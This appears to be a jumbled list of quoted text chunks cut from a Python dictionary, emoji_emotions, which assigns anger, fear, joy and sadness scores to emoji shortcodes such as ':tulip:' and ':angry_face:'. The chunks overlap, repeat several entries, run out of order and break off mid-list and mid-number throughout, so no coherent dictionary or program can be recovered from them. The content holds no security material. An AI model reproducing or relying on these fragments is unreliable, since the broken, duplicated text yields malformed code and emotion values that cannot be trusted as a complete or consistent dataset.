0.298, 0.289], \":tulip:\": [0.175,", "0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187],", "0.128, 0.111], \":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\":", "0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\":", "0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281,", "[0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221,", "[0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12,", "0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13],", "0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\":", "[0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264,", "0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002,", "[0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067,", "[0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138,", "\":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 
0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439,", "[0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262,", "0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237,", "0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109],", "0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213,", "0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157],", "0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001,", "[0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001,", "0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183,", "0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392,", "0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\":", "\":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172], 
\":laptop_computer:\": [0.127, 0.23399999999999999,", "[0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14,", "0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336],", "0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22,", "0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363,", "0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127],", "0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\":", "0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002,", "0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255],", "\":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255,", "0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002],", "[0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509,", "0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], 
\":yellow_heart:\": [0.158, 0.177, 0.27, 0.262],", "0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\":", "\":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21,", "\":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193], \":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998,", "0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\":", "\":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\": [0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003,", "[0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002,", "[0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22,", "0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998],", "[0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257,", "[0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225,", "0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\":", "0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245], 
\":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\":", "0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168,", "[0.20199999999999999, 0.203, 0.345, 0.193], \":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188,", "0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001, 0.063, 0.19899999999999998],", "0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149, 0.11],", "0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\":", "[0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122,", "0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 0.134], \":person_swimming:\": [0.175,", "0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353,", "0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\":", "0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162],", "0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14],", "\":waving_hand:\": [0.256, 0.252, 0.146, 
0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2,", "0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221,", "\":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078,", "\":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002,", "0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361],", "\":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31,", "0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\":", "\":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23,", "0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295],", "\":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092,", "0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055,", "[0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155, 
0.225,", "0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348,", "0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002],", "# anger, fear, joy, sadness emoji_emotions = { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222],", "0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\": [0.172,", "\":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15,", "0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003,", "0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998],", "0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087,", "0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\":", "0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\":", "0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231],", "[0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158,", "\":movie_camera:\": [0.142, 
0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151,", "0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 0.171, 0.302], \":warning:\": [0.264,", "0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17,", "0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\":", "\":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083,", "\":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29,", "0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09,", "0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042,", "0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165,", "0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138,", "0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221],", "0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 
0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142],", "0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\":", "\":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002,", "[0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19,", "\":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251,", "0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15,", "0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135,", "[0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179,", "[0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062,", "0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\":", "\":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263,", "0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243,", "\":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": 
[0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192,", "0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\":", "0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185],", "0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998],", "[0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259,", "0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201],", "[0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317,", "[0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21,", "0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\":", "\":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182,", "0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\":", "0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\":", "\":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243,", 
"0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996,", "[0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125,", "0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998],", "0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998,", "0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997],", "0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276,", "\":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267,", "[0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145,", "0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249],", "\":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272,", "\":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305,", "0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149],", "0.221, 
0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185],", "0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\":", "\":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999,", "0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155],", "0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171],", "0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21,", "[0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32,", "\":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306,", "0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\":", "\":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174,", "\":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077,", "0.201, 0.255], \":expressionless_face:\": [0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\":", "0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192, 0.034], 
\":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\":", "0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153],", "0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196,", "[0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134,", "[0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998,", "0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16],", "0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147,", "0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284],", "[0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998,", "0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\": [0.249,", "0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001],", "\":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 
0.22699999999999998], \":sake:\": [0.145, 0.255,", "\":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188,", "0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2,", "0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\":", "0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256,", "[0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22, 0.294,", "0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 